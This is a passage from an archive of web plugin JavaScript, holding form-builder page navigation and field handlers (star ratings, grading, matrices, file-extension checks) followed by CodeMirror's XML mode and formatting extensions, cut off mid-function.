				if_gmap_init(x+"_element"+form_id, false);
}

function display_none_form_views_all(form_id)
{
	for(t=1; t<30; t++)
		if(document.getElementById(form_id+'form_view'+t))
			document.getElementById(form_id+'form_view'+t).parentNode.style.display="none";
}

function generate_page_bar(form_view, form_id, form_view_count, form_view_max)	
{	
		if(document.getElementById(form_id+'pages').getAttribute('type')=='steps')
				make_page_steps_front(form_view, form_id, form_view_count, form_view_max);
		else
			if(document.getElementById(form_id+'pages').getAttribute('type')=='percentage')
				make_page_percentage_front(form_view, form_id, form_view_count, form_view_max);
			else
				make_page_none_front(form_id);
		

		
		
		if(document.getElementById(form_id+'pages').getAttribute('type')=='show_numbers')		
		{		
			td = document.getElementById('page_numbers'+form_view);
			if(td)	
			{	
				destroyChildren(td);
				k=0;
				for(j=1; j<=form_view_max; j++)
				{
					if(document.getElementById(form_id+'form_view'+j))
					{
						k++;		
						if(j==form_view)
							page_number=k;
					}
				}
				
				var cur = document.createElement('span');
					cur.setAttribute("class", "page_numbers");
					cur.innerHTML=page_number+'/'+k;
				
				td.appendChild(cur);
				}
		}
		else
		{	
			td = document.getElementById('page_numbers'+form_view);
			if(td)	
			{	
				destroyChildren(document.getElementById('page_numbers'+form_view));
			}
		}		
	}
function make_page_steps_front(form_view, form_id, form_view_count, form_view_max)
{
	destroyChildren(document.getElementById(form_id+'pages'));
	show_title			=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');
	next_checkable		=(document.getElementById(form_id+'form_view'+form_view).getAttribute('next_checkable')=='true');
	previous_checkable	=(document.getElementById(form_id+'form_view'+form_view).getAttribute('previous_checkable')=='true');
	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById(form_id+'form_view'+j))
			{
			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
			
			page_number = document.createElement('span');
			page_number.setAttribute('id','page_'+j);
			
			
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages;
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById(form_id+'pages').appendChild(page_number);
		}
	}

}

function make_page_percentage_front(form_view, form_id, form_view_count, form_view_max)
{
	destroyChildren(document.getElementById(form_id+'pages'));
	show_title=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
       	div.setAttribute("align", "right");
		
	var b = document.createElement('b');
       	b.setAttribute("class", "wdform_percentage_text");

	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById(form_id+'form_view'+j))
			{
			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
				
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
						cur_page_title.innerHTML=w_pages;
						
					cur_page_title.innerHTML=w_pages;										
					cur_page_title.setAttribute("class", "wdform_percentage_title");
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById(form_id+'pages').appendChild(div_parent);

	
}

function make_page_none_front(form_id)
{
	destroyChildren(document.getElementById(form_id+'pages'));
}

function make_pagebreak_button(next_or_previous,title,type, class_, checkable, id, form_id, form_view_count, form_view_max)
{
	switch(type)
	{
		case 'button': 
		{ 
		
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('type', "button");
				element.setAttribute('class', class_);
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'text': {	
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'img':{ 			
		
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
				
				if(title.indexOf("http")==0)
				{
					element.src=title;
				}
				else
					element.src=JURI_ROOT+"/administrator/"+title;

				
			return element;
			
			break;
		}
	}
}

function page_previous(id, form_id, form_view_count, form_view_max)
{
	form_view_elemet=document.getElementById(form_id+'form_view'+id);
	if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)
	{
	if(form_view_elemet.parentNode.previousSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.previousSibling;
	else
		table=form_view_elemet.parentNode.previousSibling.previousSibling;
	}
	if(!table.firstChild.tagName)
		table.removeChild(table.firstChild);

	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""),form_id, form_view_count, form_view_max);
	
}

function page_next(id, form_id, form_view_count, form_view_max)
{
	form_view_elemet=document.getElementById(form_id+'form_view'+id);
	if(form_view_elemet.parentNode.nextSibling)
	{
	if(form_view_elemet.parentNode.nextSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.nextSibling;
	else
		table=form_view_elemet.parentNode.nextSibling.nextSibling;
	}
	if(!table.firstChild.tagName)
		table.removeChild(table.firstChild);

	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""), form_id, form_view_count, form_view_max);
	
}

function randomSort(a,b) {
    return( parseInt( Math.random()*10 ) %2 );
}

function choises_randomize(id, form_id)
{
ot=-1;
j_array=new Array;
for(j=0; j<100; j++)
	if(document.getElementById(id+"_element"+form_id+j))
		{
			if(document.getElementById(id+"_element"+form_id+j).getAttribute("other"))
				if(document.getElementById(id+"_element"+form_id+j).getAttribute("other")==1)
				{	ot=j; continue;}
			j_array.push(j);
		}
j_array.sort(randomSort);


parent_=document.getElementById(id+"_element"+form_id+j_array[0]).parentNode.parentNode.parentNode;

for(j=0; j<j_array.length; j++)
	parent_.appendChild(document.getElementById(id+"_element"+form_id+j_array[j]).parentNode.parentNode);
	
if(ot!=-1)	
	parent_.appendChild(document.getElementById(id+"_element"+form_id+ot).parentNode.parentNode);

}
	
function remove_add_(id)
{
attr_name= new Array();
attr_value= new Array();
var input = document.getElementById(id); 
atr=input.attributes;
for(v=0;v<30;v++)
	if(atr[v] )
	{
		if(atr[v].name.indexOf("add_")==0)
		{
			attr_name.push(atr[v].name.replace('add_',''));
			attr_value.push(atr[v].value);
			input.removeAttribute(atr[v].name);
			v--;
		}
	}
for(v=0;v<attr_name.length; v++)
{
	input.setAttribute(attr_name[v],attr_value[v])
}

}
	
function getfileextension(id, form_id) 
{ 
 var fileinput = document.getElementById(id+"_element"+form_id); 
 var filename = fileinput.value; 
 if( filename.length == 0 ) 
 return true; 
 var dot = filename.lastIndexOf("."); 
 var extension = filename.substr(dot+1,filename.length); 
 var exten = document.getElementById(id+"_extension").value.replace("***extensionverj"+id+"***", "").replace("***extensionskizb"+id+"***", "");
 exten=exten.split(',');
 
 for(x=0 ; x<exten.length; x++)
 {
  exten[x]=exten[x].replace(/\./g,'');
  exten[x]=exten[x].replace(/ /g,'');
  if(extension.toLowerCase()==exten[x].toLowerCase())
  	return true;
 }
 return false; 
} 

	
function check_required(){}	
	
function check(){}

var rated=false;

function change_src(id,a){

if(rated==false){

for(var j=0;j<=id;j++)

document.getElementById(a+'_star_'+j).src = plugin_url+'/images/star_'+document.getElementById(a+'_star_colorform_id_temp').value+".png";

}

}





function reset_src(id,a){

if(rated==false){

for(var j=0;j<=id;j++)

document.getElementById(a+'_star_'+j).src = plugin_url+'/images/star.png';

}

}









function select_star_rating(id,a)

{

rated=true;

star_amount=document.getElementById(a+'_star_amountform_id_temp').value;

for(var j=0;j<=id;j++)

document.getElementById(a+'_star_'+j).src = plugin_url+'/images/star_'+document.getElementById(a+'_star_colorform_id_temp').value+".png";

for(var k=id+1;k<=star_amount-1;k++)

document.getElementById(a+'_star_'+k).src = plugin_url+'/images/star.png';

document.getElementById(a+'_selected_star_amountform_id_temp').value=id+1;

}





function edit_star_rating(id,a)

{

rated=true;

star_amount=document.getElementById(a+'_star_amountform_id_temp').value;

for(var j=0;j<=id;j++)

document.getElementById(a+'_star_'+j).src = plugin_url+'/images/star_'+document.getElementById(a+'_star_colorform_id_temp').value+".png";

for(var k=id+1;k<=star_amount-1;k++)

document.getElementById(a+'_star_'+k).src = plugin_url+'/images/star.png';

document.getElementById(a+'_selected_star_amountform_id_temp').value=id+1;

document.getElementById('submission_'+a).value=star_amount+'***'+(id+1)+'***'+document.getElementById(a+'_star_colorform_id_temp').value+"***star_rating***";



}



function edit_scale_rating(checked_value,a)

{

if(!checked_value)

var checked_radio_value = 0;

scale_amount=document.getElementById(a+'_scale_checkedform_id_temp').value;

document.getElementById('submission_'+a).value=checked_value+'/'+scale_amount;



}





function edit_range(value,id,num){

document.getElementById(id+'_element'+num).value=value;

document.getElementById('submission_'+id).value=document.getElementById(id+'_element0').value+"-"+document.getElementById(id+'_element1').value;

}







function sum_grading_values(num,form_id){



	var sum = 0;

	for(var k=0; k<100;k++)

	{

		if(document.getElementById(num+'_elementform_id_temp'+k))

			if(document.getElementById(num+'_elementform_id_temp'+k).value)

			{

				sum = sum+parseInt(document.getElementById(num+'_elementform_id_temp'+k).value);

			}



		if(sum > document.getElementById(num+'_total_elementform_id_temp').innerHTML){

		document.getElementById(num+'_text_elementform_id_temp').innerHTML = " Your score should be less than "+document.getElementById(num+'_total_elementform_id_temp').innerHTML;

		}

		else

		{

		document.getElementById(num+'_text_elementform_id_temp').innerHTML = "";

		}

	}

	document.getElementById(num+'_sum_elementform_id_temp').innerHTML = sum;



}



function edit_grading(num,items_count){

	var sum = 0;

	var elements_to_add ="";

	for(var k=0; k<100;k++)

	{

		if(document.getElementById(num+'_element'+k))

		if(document.getElementById(num+'_element'+k).value)

		{

			sum = sum+parseInt(document.getElementById(num+'_element'+k).value);

		}



	if(sum > document.getElementById(num+'_grading_totalform_id_temp').innerHTML){

	document.getElementById(num+'_text_elementform_id_temp').innerHTML = " Your score should be less than "+document.getElementById(num+'_grading_totalform_id_temp').innerHTML;

	}

}

	document.getElementById(num+'_grading_sumform_id_temp').innerHTML = sum;

	element = document.getElementById(num+'_element_valueform_id_temp').value;

	

	element = element.split(':');



	for(var k=0; k<(element.length-1)/2;k++){

	if(document.getElementById(num+'_element'+k).value)

	elements_to_add += document.getElementById(num+'_element'+k).value + ":"; 

	else

	elements_to_add += ":"; 

	}

	element = element.slice((element.length-1)/2);

	element = element.join(':');

	grading = elements_to_add + element;



	document.getElementById(num+'_element_valueform_id_temp').value = grading;

	document.getElementById('submission_'+num).value = grading+"***grading***";

}









function change_radio_values(a,id,rows_count,columns_count){

	var annnn="";

	var not_found=true;

	

		for(var j=1;j<=rows_count;j++)

		{

			for(var k=1;k<=columns_count;k++)

			{

			if(document.getElementById(id+'_input_elementform_id_temp'+j+'_'+k).checked==true)

			{

			 annnn += j+'_'+k+'***';

			 not_found = false;

			 break;

			}

			}



			if(not_found==true)

			 annnn +='0'+'***';



			not_found=true;

		}



	var element = document.getElementById(id+'_matrixform_id_temp').value;



	element = element.split('***');

	element = element.slice(0,-(rows_count+1));

	element = element.join('***');

	element += '***'+annnn;

	

	document.getElementById('submission_'+id).value=element+'***matrix***';

	document.getElementById(id+'_matrixform_id_temp').value=element;

}





function change_checkbox_values(a,id,rows_count,columns_count){

	var annnn="";



	for(var j=1;j<=rows_count;j++)

	{

		for(var k=1;k<=columns_count;k++)

		{

			if(document.getElementById(id+'_input_elementform_id_temp'+j+'_'+k).checked==true)

			 annnn += 1+'***';

			else

			annnn += 0+'***';

		}

	}



	var element = document.getElementById(id+'_matrixform_id_temp').value;



	element = element.slice(0,-(4*rows_count*columns_count));

	element += annnn;



	document.getElementById('submission_'+id).value=element+'***matrix***';

	document.getElementById(id+'_matrixform_id_temp').value=element;

}



function change_text_values(a,id,rows_count,columns_count){

	var annnn="";



	for(var j=1;j<=rows_count;j++)

	{

		for(var k=1;k<=columns_count;k++)

		{

		 annnn += document.getElementById(id+'_input_elementform_id_temp'+j+'_'+k).value+'***';



		}

	}



	var element = document.getElementById(id+'_matrixform_id_temp').value;



	element = element.split('***');

	element = element.slice(0,-(rows_count*columns_count+1));


	element = element.join('***');

	element += '***'+annnn;


	document.getElementById('submission_'+id).value=element+'***matrix***';

	document.getElementById(id+'_matrixform_id_temp').value=element;

}



function change_option_values(a,id,rows_count,columns_count){

	var annnn="";



	for(var j=1;j<=rows_count;j++)

	{

		for(var k=1;k<=columns_count;k++)

		{

		 annnn += document.getElementById(id+'_select_yes_noform_id_temp'+j+'_'+k).value+'***';



		}

	}



	var element = document.getElementById(id+'_matrixform_id_temp').value;



	element = element.split('***');

	element = element.slice(0,-(rows_count*columns_count+1));



	element = element.join('***');
	element += '***'+annnn;



	document.getElementById('submission_'+id).value=element+'***matrix***';

	document.getElementById(id+'_matrixform_id_temp').value=element;

}

js/layout/xml.js000060400000023672152434416630007651 0ustar00CodeMirror.defineMode("xml", function(config, parserConfig) {
  var indentUnit = config.indentUnit;
  var Kludges = parserConfig.htmlMode ? {
    autoSelfClosers: {'area': true, 'base': true, 'br': true, 'col': true, 'command': true,
                      'embed': true, 'frame': true, 'hr': true, 'img': true, 'input': true,
                      'keygen': true, 'link': true, 'meta': true, 'param': true, 'source': true,
                      'track': true, 'wbr': true},
    implicitlyClosed: {'dd': true, 'li': true, 'optgroup': true, 'option': true, 'p': true,
                       'rp': true, 'rt': true, 'tbody': true, 'td': true, 'tfoot': true,
                       'th': true, 'tr': true},
    contextGrabbers: {
      'dd': {'dd': true, 'dt': true},
      'dt': {'dd': true, 'dt': true},
      'li': {'li': true},
      'option': {'option': true, 'optgroup': true},
      'optgroup': {'optgroup': true},
      'p': {'address': true, 'article': true, 'aside': true, 'blockquote': true, 'dir': true,
            'div': true, 'dl': true, 'fieldset': true, 'footer': true, 'form': true,
            'h1': true, 'h2': true, 'h3': true, 'h4': true, 'h5': true, 'h6': true,
            'header': true, 'hgroup': true, 'hr': true, 'menu': true, 'nav': true, 'ol': true,
            'p': true, 'pre': true, 'section': true, 'table': true, 'ul': true},
      'rp': {'rp': true, 'rt': true},
      'rt': {'rp': true, 'rt': true},
      'tbody': {'tbody': true, 'tfoot': true},
      'td': {'td': true, 'th': true},
      'tfoot': {'tbody': true},
      'th': {'td': true, 'th': true},
      'thead': {'tbody': true, 'tfoot': true},
      'tr': {'tr': true}
    },
    doNotIndent: {"pre": true},
    allowUnquoted: true,
    allowMissing: false
  } : {
    autoSelfClosers: {},
    implicitlyClosed: {},
    contextGrabbers: {},
    doNotIndent: {},
    allowUnquoted: false,
    allowMissing: false
  };
  var alignCDATA = parserConfig.alignCDATA;

  // Return variables for tokenizers
  var tagName, type;

  function inText(stream, state) {
    function chain(parser) {
      state.tokenize = parser;
      return parser(stream, state);
    }

    var ch = stream.next();
    if (ch == "<") {
      if (stream.eat("!")) {
        if (stream.eat("[")) {
          if (stream.match("CDATA[")) return chain(inBlock("atom", "]]>"));
          else return null;
        }
        else if (stream.match("--")) return chain(inBlock("comment", "-->"));
        else if (stream.match("DOCTYPE", true, true)) {
          stream.eatWhile(/[\w\._\-]/);
          return chain(doctype(1));
        }
        else return null;
      }
      else if (stream.eat("?")) {
        stream.eatWhile(/[\w\._\-]/);
        state.tokenize = inBlock("meta", "?>");
        return "meta";
      }
      else {
        type = stream.eat("/") ? "closeTag" : "openTag";
        stream.eatSpace();
        tagName = "";
        var c;
        while ((c = stream.eat(/[^\s\u00a0=<>\"\'\/?]/))) tagName += c;
        state.tokenize = inTag;
        return "tag";
      }
    }
    else if (ch == "&") {
      var ok;
      if (stream.eat("#")) {
        if (stream.eat("x")) {
          ok = stream.eatWhile(/[a-fA-F\d]/) && stream.eat(";");          
        } else {
          ok = stream.eatWhile(/[\d]/) && stream.eat(";");
        }
      } else {
        ok = stream.eatWhile(/[\w\.\-:]/) && stream.eat(";");
      }
      return ok ? "atom" : "error";
    }
    else {
      stream.eatWhile(/[^&<]/);
      return null;
    }
  }

  function inTag(stream, state) {
    var ch = stream.next();
    if (ch == ">" || (ch == "/" && stream.eat(">"))) {
      state.tokenize = inText;
      type = ch == ">" ? "endTag" : "selfcloseTag";
      return "tag";
    }
    else if (ch == "=") {
      type = "equals";
      return null;
    }
    else if (/[\'\"]/.test(ch)) {
      state.tokenize = inAttribute(ch);
      return state.tokenize(stream, state);
    }
    else {
      stream.eatWhile(/[^\s\u00a0=<>\"\'\/?]/);
      return "word";
    }
  }

  function inAttribute(quote) {
    return function(stream, state) {
      while (!stream.eol()) {
        if (stream.next() == quote) {
          state.tokenize = inTag;
          break;
        }
      }
      return "string";
    };
  }

  function inBlock(style, terminator) {
    return function(stream, state) {
      while (!stream.eol()) {
        if (stream.match(terminator)) {
          state.tokenize = inText;
          break;
        }
        stream.next();
      }
      return style;
    };
  }
  function doctype(depth) {
    return function(stream, state) {
      var ch;
      while ((ch = stream.next()) != null) {
        if (ch == "<") {
          state.tokenize = doctype(depth + 1);
          return state.tokenize(stream, state);
        } else if (ch == ">") {
          if (depth == 1) {
            state.tokenize = inText;
            break;
          } else {
            state.tokenize = doctype(depth - 1);
            return state.tokenize(stream, state);
          }
        }
      }
      return "meta";
    };
  }

  var curState, setStyle;
  function pass() {
    for (var i = arguments.length - 1; i >= 0; i--) curState.cc.push(arguments[i]);
  }
  function cont() {
    pass.apply(null, arguments);
    return true;
  }

  function pushContext(tagName, startOfLine) {
    var noIndent = Kludges.doNotIndent.hasOwnProperty(tagName) || (curState.context && curState.context.noIndent);
    curState.context = {
      prev: curState.context,
      tagName: tagName,
      indent: curState.indented,
      startOfLine: startOfLine,
      noIndent: noIndent
    };
  }
  function popContext() {
    if (curState.context) curState.context = curState.context.prev;
  }

  function element(type) {
    if (type == "openTag") {
      curState.tagName = tagName;
      return cont(attributes, endtag(curState.startOfLine));
    } else if (type == "closeTag") {
      var err = false;
      if (curState.context) {
        if (curState.context.tagName != tagName) {
          if (Kludges.implicitlyClosed.hasOwnProperty(curState.context.tagName.toLowerCase())) {
            popContext();
          }
          err = !curState.context || curState.context.tagName != tagName;
        }
      } else {
        err = true;
      }
      if (err) setStyle = "error";
      return cont(endclosetag(err));
    }
    return cont();
  }
  function endtag(startOfLine) {
    return function(type) {
      if (type == "selfcloseTag" ||
          (type == "endTag" && Kludges.autoSelfClosers.hasOwnProperty(curState.tagName.toLowerCase()))) {
        maybePopContext(curState.tagName.toLowerCase());
        return cont();
      }
      if (type == "endTag") {
        maybePopContext(curState.tagName.toLowerCase());
        pushContext(curState.tagName, startOfLine);
        return cont();
      }
      return cont();
    };
  }
  function endclosetag(err) {
    return function(type) {
      if (err) setStyle = "error";
      if (type == "endTag") { popContext(); return cont(); }
      setStyle = "error";
      return cont(arguments.callee);
    }
  }
  function maybePopContext(nextTagName) {
    var parentTagName;
    while (true) {
      if (!curState.context) {
        return;
      }
      parentTagName = curState.context.tagName.toLowerCase();
      if (!Kludges.contextGrabbers.hasOwnProperty(parentTagName) ||
          !Kludges.contextGrabbers[parentTagName].hasOwnProperty(nextTagName)) {
        return;
      }
      popContext();
    }
  }

  function attributes(type) {
    if (type == "word") {setStyle = "attribute"; return cont(attribute, attributes);}
    if (type == "endTag" || type == "selfcloseTag") return pass();
    setStyle = "error";
    return cont(attributes);
  }
  function attribute(type) {
    if (type == "equals") return cont(attvalue, attributes);
    if (!Kludges.allowMissing) setStyle = "error";
    return (type == "endTag" || type == "selfcloseTag") ? pass() : cont();
  }
  function attvalue(type) {
    if (type == "string") return cont(attvaluemaybe);
    if (type == "word" && Kludges.allowUnquoted) {setStyle = "string"; return cont();}
    setStyle = "error";
    return (type == "endTag" || type == "selfCloseTag") ? pass() : cont();
  }
  function attvaluemaybe(type) {
    if (type == "string") return cont(attvaluemaybe);
    else return pass();
  }

  return {
    startState: function() {
      return {tokenize: inText, cc: [], indented: 0, startOfLine: true, tagName: null, context: null};
    },

    token: function(stream, state) {
      if (stream.sol()) {
        state.startOfLine = true;
        state.indented = stream.indentation();
      }
      if (stream.eatSpace()) return null;

      setStyle = type = tagName = null;
      var style = state.tokenize(stream, state);
      state.type = type;
      if ((style || type) && style != "comment") {
        curState = state;
        while (true) {
          var comb = state.cc.pop() || element;
          if (comb(type || style)) break;
        }
      }
      state.startOfLine = false;
      return setStyle || style;
    },

    indent: function(state, textAfter, fullLine) {
      var context = state.context;
      if ((state.tokenize != inTag && state.tokenize != inText) ||
          context && context.noIndent)
        return fullLine ? fullLine.match(/^(\s*)/)[0].length : 0;
      if (alignCDATA && /<!\[CDATA\[/.test(textAfter)) return 0;
      if (context && /^<\//.test(textAfter))
        context = context.prev;
      while (context && !context.startOfLine)
        context = context.prev;
      if (context) return context.indent + indentUnit;
      else return 0;
    },

    compareStates: function(a, b) {
      if (a.indented != b.indented || a.tokenize != b.tokenize) return false;
      for (var ca = a.context, cb = b.context; ; ca = ca.prev, cb = cb.prev) {
        if (!ca || !cb) return ca == cb;
        if (ca.tagName != cb.tagName) return false;
      }
    },

    electricChars: "/"
  };
});

CodeMirror.defineMIME("application/xml", "xml");
if (!CodeMirror.mimeModes.hasOwnProperty("text/html"))
  CodeMirror.defineMIME("text/html", {name: "xml", htmlMode: true});
js/layout/formatting.js000060400000024204152434416630011213 0ustar00// ============== Formatting extensions ============================
// A common storage for all mode-specific formatting features
if (!CodeMirror.modeExtensions) CodeMirror.modeExtensions = {};

// Returns the extension of the editor's current mode
CodeMirror.defineExtension("getModeExt", function () {
  var mname = CodeMirror.resolveMode(this.getOption("mode")).name;
  var ext = CodeMirror.modeExtensions[mname];
  if (!ext) throw new Error("No extensions found for mode " + mname);
  return ext;
});

// If the current mode is 'htmlmixed', returns the extension of a mode located at
// the specified position (can be htmlmixed, css or javascript). Otherwise, simply
// returns the extension of the editor's current mode.
CodeMirror.defineExtension("getModeExtAtPos", function (pos) {
  var token = this.getTokenAt(pos);
  if (token && token.state && token.state.mode)
    return CodeMirror.modeExtensions[token.state.mode == "html" ? "htmlmixed" : token.state.mode];
  else
    return this.getModeExt();
});

// Comment/uncomment the specified range
CodeMirror.defineExtension("commentRange", function (isComment, from, to) {
  var curMode = this.getModeExtAtPos(this.getCursor());
  if (isComment) { // Comment range
    var commentedText = this.getRange(from, to);
    this.replaceRange(curMode.commentStart + this.getRange(from, to) + curMode.commentEnd
      , from, to);
    if (from.line == to.line && from.ch == to.ch) { // An empty comment inserted - put cursor inside
      this.setCursor(from.line, from.ch + curMode.commentStart.length);
    }
  }
  else { // Uncomment range
    var selText = this.getRange(from, to);
    var startIndex = selText.indexOf(curMode.commentStart);
    var endIndex = selText.lastIndexOf(curMode.commentEnd);
    if (startIndex > -1 && endIndex > -1 && endIndex > startIndex) {
      // Take string till comment start
      selText = selText.substr(0, startIndex)
      // From comment start till comment end
        + selText.substring(startIndex + curMode.commentStart.length, endIndex)
      // From comment end till string end
        + selText.substr(endIndex + curMode.commentEnd.length);
    }
    this.replaceRange(selText, from, to);
  }
});

// Applies automatic mode-aware indentation to the specified range
CodeMirror.defineExtension("autoIndentRange", function (from, to) {
  var cmInstance = this;
  this.operation(function () {
    for (var i = from.line; i <= to.line; i++) {
      cmInstance.indentLine(i, "smart");
    }
  });
});

// Applies automatic formatting to the specified range
CodeMirror.defineExtension("autoFormatRange", function (from, to) {
  var absStart = this.indexFromPos(from);
  var absEnd = this.indexFromPos(to);
  // Insert additional line breaks where necessary according to the
  // mode's syntax
  var res = this.getModeExt().autoFormatLineBreaks(this.getValue(), absStart, absEnd);
  var cmInstance = this;

  // Replace and auto-indent the range
  this.operation(function () {
    cmInstance.replaceRange(res, from, to);
    var startLine = cmInstance.posFromIndex(absStart).line;
    var endLine = cmInstance.posFromIndex(absStart + res.length).line;
    for (var i = startLine; i <= endLine; i++) {
      cmInstance.indentLine(i, "smart");
    }
  });
});

// Define extensions for a few modes

CodeMirror.modeExtensions["css"] = {
  commentStart: "/*",
  commentEnd: "*/",
  wordWrapChars: [";", "\\{", "\\}"],
  autoFormatLineBreaks: function (text, startPos, endPos) {
    text = text.substring(startPos, endPos);
    return text.replace(new RegExp("(;|\\{|\\})([^\r\n])", "g"), "$1\n$2");
  }
};

CodeMirror.modeExtensions["javascript"] = {
  commentStart: "/*",
  commentEnd: "*/",
  wordWrapChars: [";", "\\{", "\\}"],

  getNonBreakableBlocks: function (text) {
    var nonBreakableRegexes = [
        new RegExp("for\\s*?\\(([\\s\\S]*?)\\)"),
        new RegExp("'([\\s\\S]*?)('|$)"),
        new RegExp("\"([\\s\\S]*?)(\"|$)"),
        new RegExp("//.*([\r\n]|$)")
      ];
    var nonBreakableBlocks = new Array();
    for (var i = 0; i < nonBreakableRegexes.length; i++) {
      var curPos = 0;
      while (curPos < text.length) {
        var m = text.substr(curPos).match(nonBreakableRegexes[i]);
        if (m != null) {
          nonBreakableBlocks.push({
            start: curPos + m.index,
            end: curPos + m.index + m[0].length
          });
          curPos += m.index + Math.max(1, m[0].length);
        }
        else { // No more matches
          break;
        }
      }
    }
    nonBreakableBlocks.sort(function (a, b) {
      return a.start - b.start;
    });

    return nonBreakableBlocks;
  },

  autoFormatLineBreaks: function (text, startPos, endPos) {
    text = text.substring(startPos, endPos);
    var curPos = 0;
    var reLinesSplitter = new RegExp("(;|\\{|\\})([^\r\n])", "g");
    var nonBreakableBlocks = this.getNonBreakableBlocks(text);
    if (nonBreakableBlocks != null) {
      var res = "";
      for (var i = 0; i < nonBreakableBlocks.length; i++) {
        if (nonBreakableBlocks[i].start > curPos) { // Break lines till the block
          res += text.substring(curPos, nonBreakableBlocks[i].start).replace(reLinesSplitter, "$1\n$2");
          curPos = nonBreakableBlocks[i].start;
        }
        if (nonBreakableBlocks[i].start <= curPos
          && nonBreakableBlocks[i].end >= curPos) { // Skip non-breakable block
          res += text.substring(curPos, nonBreakableBlocks[i].end);
          curPos = nonBreakableBlocks[i].end;
        }
      }
      if (curPos < text.length - 1) {
        res += text.substr(curPos).replace(reLinesSplitter, "$1\n$2");
      }
      return res;
    }
    else {
      return text.replace(reLinesSplitter, "$1\n$2");
    }
  }
};

CodeMirror.modeExtensions["xml"] = {
  commentStart: "<!--",
  commentEnd: "-->",
  wordWrapChars: [">"],

  autoFormatLineBreaks: function (text, startPos, endPos) {
    text = text.substring(startPos, endPos);
    var lines = text.split("\n");
    var reProcessedPortion = new RegExp("(^\\s*?<|^[^<]*?)(.+)(>\\s*?$|[^>]*?$)");
    var reOpenBrackets = new RegExp("<", "g");
    var reCloseBrackets = new RegExp("(>)([^\r\n])", "g");
    for (var i = 0; i < lines.length; i++) {
      var mToProcess = lines[i].match(reProcessedPortion);
      if (mToProcess != null && mToProcess.length > 3) { // The line starts with whitespaces and ends with whitespaces
        lines[i] = mToProcess[1]
            + mToProcess[2].replace(reOpenBrackets, "\n$&").replace(reCloseBrackets, "$1\n$2")
            + mToProcess[3];
        continue;
      }
    }

    return lines.join("\n");
  }
};

CodeMirror.modeExtensions["htmlmixed"] = {
  commentStart: "<!--",
  commentEnd: "-->",
  wordWrapChars: [">", ";", "\\{", "\\}"],

  getModeInfos: function (text, absPos) {
    var modeInfos = new Array();
    modeInfos[0] =
      {
        pos: 0,
        modeExt: CodeMirror.modeExtensions["xml"],
        modeName: "xml"
      };

    var modeMatchers = new Array();
    modeMatchers[0] =
      {
        regex: new RegExp("<style[^>]*>([\\s\\S]*?)(</style[^>]*>|$)", "i"),
        modeExt: CodeMirror.modeExtensions["css"],
        modeName: "css"
      };
    modeMatchers[1] =
      {
        regex: new RegExp("<script[^>]*>([\\s\\S]*?)(</script[^>]*>|$)", "i"),
        modeExt: CodeMirror.modeExtensions["javascript"],
        modeName: "javascript"
      };

    var lastCharPos = (typeof (absPos) !== "undefined" ? absPos : text.length - 1);
    // Detect modes for the entire text
    for (var i = 0; i < modeMatchers.length; i++) {
      var curPos = 0;
      while (curPos <= lastCharPos) {
        var m = text.substr(curPos).match(modeMatchers[i].regex);
        if (m != null) {
          if (m.length > 1 && m[1].length > 0) {
            // Push block begin pos
            var blockBegin = curPos + m.index + m[0].indexOf(m[1]);
            modeInfos.push(
              {
                pos: blockBegin,
                modeExt: modeMatchers[i].modeExt,
                modeName: modeMatchers[i].modeName
              });
            // Push block end pos
            modeInfos.push(
              {
                pos: blockBegin + m[1].length,
                modeExt: modeInfos[0].modeExt,
                modeName: modeInfos[0].modeName
              });
            curPos += m.index + m[0].length;
            continue;
          }
          else {
            curPos += m.index + Math.max(m[0].length, 1);
          }
        }
        else { // No more matches
          break;
        }
      }
    }
    // Sort mode infos
    modeInfos.sort(function sortModeInfo(a, b) {
      return a.pos - b.pos;
    });

    return modeInfos;
  },

  autoFormatLineBreaks: function (text, startPos, endPos) {
    var modeInfos = this.getModeInfos(text);
    var reBlockStartsWithNewline = new RegExp("^\\s*?\n");
    var reBlockEndsWithNewline = new RegExp("\n\\s*?$");
    var res = "";
    // Use modes info to break lines correspondingly
    if (modeInfos.length > 1) { // Deal with multi-mode text
      for (var i = 1; i <= modeInfos.length; i++) {
        var selStart = modeInfos[i - 1].pos;
        var selEnd = (i < modeInfos.length ? modeInfos[i].pos : endPos);

        if (selStart >= endPos) { // The block starts later than the needed fragment
          break;
        }
        if (selStart < startPos) {
          if (selEnd <= startPos) { // The block starts earlier than the needed fragment
            continue;
          }
          selStart = startPos;
        }
        if (selEnd > endPos) {
          selEnd = endPos;
        }
        var textPortion = text.substring(selStart, selEnd);
